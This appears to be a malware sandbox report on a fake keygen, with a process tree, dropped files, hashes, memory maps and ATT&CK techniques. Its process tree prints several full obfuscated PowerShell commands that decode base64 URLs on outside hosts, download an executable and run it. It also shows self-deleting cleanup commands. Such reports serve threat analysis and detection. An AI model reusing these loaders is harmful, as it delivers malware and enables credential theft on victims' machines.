                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1756
                  • C:\Users\Public\xfs.exe
                    "C:\Users\Public\xfs.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2508
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                      6⤵
                      • Loads dropped DLL
                      PID:112
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        PID:552
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                          8⤵
                          • Loads dropped DLL
                          PID:2900
                          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                            9⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2828
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                              "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                              10⤵
                              • Executes dropped EXE
                              PID:824
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          8⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          PID:2964
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /pid 2964 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\073072799244344\\* & exit
                            9⤵
                              PID:2192
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /pid 2964
                                10⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1936
                      • C:\Users\Public\xfs.exe
                        "C:\Users\Public\xfs.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2496
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8C48.tmp\b1.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:1568
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1416
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 2
                  3⤵
                  • Delays execution with timeout.exe
                  PID:1620
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8C48.tmp\ba.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:2020
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Blocklisted process makes network request
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1328
                    • C:\Users\Public\lcp.exe
                      "C:\Users\Public\lcp.exe"
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:2648
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:2824
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                          7⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          PID:2276
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /pid 2276 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\341333300309707\\* & exit
                            8⤵
                              PID:2748
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /pid 2276
                                9⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2724
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                          "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:2888
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:2352
                        • C:\Users\Public\lcp.exe
                          "C:\Users\Public\lcp.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:2940
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8C48.tmp\ba1.hta"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:832
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1500

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Persistence

              Modify Existing Service

              1
              T1031

              Defense Evasion

              Modify Registry

              4
              T1112

              Disabling Security Tools

              2
              T1089

              Install Root Certificate

              1
              T1130

              Credential Access

              Credentials in Files

              3
              T1081

              Discovery

              Query Registry

              2
              T1012

              System Information Discovery

              2
              T1082

              Collection

              Data from Local System

              3
              T1005

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\ProgramData\MSVCP140.dll
              • C:\ProgramData\VCRUNTIME140.dll
              • C:\ProgramData\freebl3.dll
              • C:\ProgramData\mozglue.dll
              • C:\ProgramData\mozglue.dll
              • C:\ProgramData\msvcp140.dll
              • C:\ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • C:\ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • C:\ProgramData\softokn3.dll
              • C:\ProgramData\sqlite3.dll
              • C:\ProgramData\sqlite3.dll
              • C:\ProgramData\vcruntime140.dll
              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6b1013e3-c80a-4d33-a627-c799d65b5191
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7876c98a-372f-4406-8f8d-7cd5e17c07f9
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_947b3ffb-392f-41ae-b838-3e08d02dfbe4
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b19f0632-1a7c-4dc8-bc25-4cb7dc6803e3
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Temp\4N551snBw9.exe
              • C:\Users\Admin\AppData\Local\Temp\4N551snBw9.exe
              • C:\Users\Admin\AppData\Local\Temp\8C48.tmp\Keygen.exe
              • C:\Users\Admin\AppData\Local\Temp\8C48.tmp\Keygen.exe
              • C:\Users\Admin\AppData\Local\Temp\8C48.tmp\b.hta
              • C:\Users\Admin\AppData\Local\Temp\8C48.tmp\b1.hta
              • C:\Users\Admin\AppData\Local\Temp\8C48.tmp\ba.hta
              • C:\Users\Admin\AppData\Local\Temp\8C48.tmp\ba1.hta
              • C:\Users\Admin\AppData\Local\Temp\8C48.tmp\m.hta
              • C:\Users\Admin\AppData\Local\Temp\8C48.tmp\m1.hta
              • C:\Users\Admin\AppData\Local\Temp\8C48.tmp\start.bat
              • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\PgJx5zzNsk.exe
              • C:\Users\Admin\AppData\Local\Temp\PgJx5zzNsk.exe
              • C:\Users\Admin\AppData\Local\Temp\RWD8TjIgIx.exe
              • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\rOAv8Mp2bB.exe
              • C:\Users\Admin\AppData\Local\Temp\rOAv8Mp2bB.exe
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Public\lcp.exe
              • C:\Users\Public\lcp.exe
              • C:\Users\Public\lcp.exe
              • C:\Users\Public\qub.exe
              • C:\Users\Public\qub.exe
              • C:\Users\Public\qub.exe
              • C:\Users\Public\xfs.exe
              • C:\Users\Public\xfs.exe
              • C:\Users\Public\xfs.exe
              • C:\Windows\temp\mbilhtr1.inf
              • \??\PIPE\lsarpc
              • \??\PIPE\srvsvc
              • \??\PIPE\srvsvc
              • \??\PIPE\srvsvc
              • \ProgramData\mozglue.dll
              • \ProgramData\mozglue.dll
              • \ProgramData\mozglue.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\sqlite3.dll
              • \ProgramData\sqlite3.dll
              • \ProgramData\sqlite3.dll
              • \ProgramData\vcruntime140.dll
              • \ProgramData\vcruntime140.dll
              • \ProgramData\vcruntime140.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                MD5

                02cc7b8ee30056d5912de54f1bdfc219

                SHA1

                a6923da95705fb81e368ae48f93d28522ef552fb

                SHA256

                1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                SHA512

                0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
              • \Users\Admin\AppData\LocalLow\sqlite3.dll
              • \Users\Admin\AppData\Local\Temp\4N551snBw9.exe
              • \Users\Admin\AppData\Local\Temp\8C48.tmp\Keygen.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\PgJx5zzNsk.exe
              • \Users\Admin\AppData\Local\Temp\RWD8TjIgIx.exe
              • \Users\Admin\AppData\Local\Temp\RWD8TjIgIx.exe
              • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • \Users\Admin\AppData\Local\Temp\rOAv8Mp2bB.exe
              • \Users\Public\lcp.exe
              • \Users\Public\lcp.exe
              • \Users\Public\qub.exe
              • \Users\Public\qub.exe
              • \Users\Public\xfs.exe
              • memory/112-219-0x0000000002600000-0x0000000002604000-memory.dmp
                Filesize

                16KB

              • memory/112-208-0x0000000000000000-mapping.dmp
              • memory/552-246-0x0000000000900000-0x0000000000951000-memory.dmp
                Filesize

                324KB

              • memory/552-221-0x0000000000E10000-0x0000000000E11000-memory.dmp
                Filesize

                4KB

              • memory/552-220-0x0000000073400000-0x0000000073AEE000-memory.dmp
                Filesize

                6.9MB

              • memory/552-223-0x00000000008B0000-0x00000000008B1000-memory.dmp
                Filesize

                4KB

              • memory/552-217-0x0000000000000000-mapping.dmp
              • memory/628-29-0x00000000716A0000-0x0000000071D8E000-memory.dmp
                Filesize

                6.9MB

              • memory/628-23-0x0000000000000000-mapping.dmp
              • memory/824-282-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

              • memory/824-40-0x0000000004C20000-0x0000000004C21000-memory.dmp
                Filesize

                4KB

              • memory/824-28-0x00000000716A0000-0x0000000071D8E000-memory.dmp
                Filesize

                6.9MB

              • memory/824-285-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

              • memory/824-46-0x0000000002800000-0x0000000002801000-memory.dmp
                Filesize

                4KB

              • memory/824-283-0x000000000041A684-mapping.dmp
              • memory/824-52-0x0000000005500000-0x0000000005501000-memory.dmp
                Filesize

                4KB

              • memory/824-22-0x0000000000000000-mapping.dmp
              • memory/832-20-0x0000000000000000-mapping.dmp
              • memory/844-302-0x0000000000000000-mapping.dmp
              • memory/844-356-0x0000000004460000-0x00000000044AC000-memory.dmp
                Filesize

                304KB

              • memory/1116-10-0x0000000000000000-mapping.dmp
              • memory/1328-26-0x0000000000000000-mapping.dmp
              • memory/1328-34-0x0000000002610000-0x0000000002611000-memory.dmp
                Filesize

                4KB

              • memory/1328-31-0x00000000716A0000-0x0000000071D8E000-memory.dmp
                Filesize

                6.9MB

              • memory/1392-320-0x0000000000000000-mapping.dmp
              • memory/1416-30-0x00000000716A0000-0x0000000071D8E000-memory.dmp
                Filesize

                6.9MB

              • memory/1416-178-0x00000000067E0000-0x00000000067E1000-memory.dmp
                Filesize

                4KB

              • memory/1416-176-0x0000000006790000-0x0000000006791000-memory.dmp
                Filesize

                4KB

              • memory/1416-24-0x0000000000000000-mapping.dmp
              • memory/1416-118-0x00000000066E0000-0x00000000066E1000-memory.dmp
                Filesize

                4KB

              • memory/1416-60-0x0000000005920000-0x0000000005921000-memory.dmp
                Filesize

                4KB

              • memory/1416-65-0x0000000005970000-0x0000000005971000-memory.dmp
                Filesize

                4KB

              • memory/1416-66-0x0000000006490000-0x0000000006491000-memory.dmp
                Filesize

                4KB

              • memory/1416-73-0x0000000006520000-0x0000000006521000-memory.dmp
                Filesize

                4KB
